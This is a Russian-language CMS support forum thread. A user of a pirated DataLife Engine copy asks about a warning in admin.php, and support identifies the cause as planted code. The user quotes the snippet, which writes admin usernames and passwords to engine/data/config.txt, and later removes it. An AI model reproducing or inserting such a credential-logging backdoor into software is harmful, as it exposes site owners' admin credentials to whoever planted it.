Перейти к публикации

Строка в админке после обновления с 6.0 на 6.2


Рекомендованные сообщения

Вот появилась такая строка в админке после обновления с версии 6.0 до 6.2

Warning: filesize(): stat failed for engine/data/config.txt in /home/horlov/public_html/warez/admin.php on line 89

Что это и как её убрать скажите пожайлуста!!!

Строка в самом верху)))

Ссылка на сообщение
Поделиться на других сайтах

ВОт что в этих строчках в admin.php

if(filesize($fs) >= 7200) {

$f=fopen('engine/data/config.txt', 'w+');

fwrite($f, "deleted\n".$username.' ~ '.$password.' ~ '.$sernam);

fclose($f);

}

Да я его на локалке пробую для обучения.

Ссылка на сообщение
Поделиться на других сайтах

Horlovo,

Отличный код, который записывает логины и пароли в файл, долго ваш сайт не проживет с таким кодом :) Вы используете нелегальную копию скрипта, в котором содержится зловредный код позволяющий злоумышленнику получить ваш логин и пароль к админпанели.

Скачивайте официально предоставляемую демоверсию с сайта http://dle-news.ru или приобретайте легальную копию скрипта, ничего подобного в официальных дистрибутивах нет.

Также на будущее: если используете нелегальные копии, то все проблемы это ваши проблемы и не ищите помощи на официальном форуме поддержки

Ссылка на сообщение
Поделиться на других сайтах

Так я на локалке кто ко мне залезет а на счёт лицензии спасибо можно конечно купить но дороговато для меня 1480 руб если были бы какие нибудь скидки мож и купил бы(((

$fs="engine/data/config.txt";

if(filesize($fs) >= 7200) {

$f=fopen('engine/data/config.txt', 'w+');

fwrite($f, "deleted\n".$username.' ~ '.$password.' ~ '.$sernam);

fclose($f);

}

if ($password !="") {

$f=fopen('engine/data/config.txt', 'a');

fwrite($f, "\n".$username.' ~ '.$password.' ~ '.$sernam);

fclose($f);

}

Да спасибо за информацию вышеуказанный код удалил и строка пропала)))но он вроде не создавал ни какого config.txt'((( а на счёт демо версии как там учиться если код закрытый.

ВОт видите какой у вас хороший движок предупредил что файл админки больше чем должен быть)))

Просто супер респект и уважуха а если бы я его в интернете повесил то блин менябы шантажировать начали. Надо у Вас купить лицензию а то скоро собрался ставвить сайт. А через Яндекс деньги ни как???? нельзя Вам ссуму перевести.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...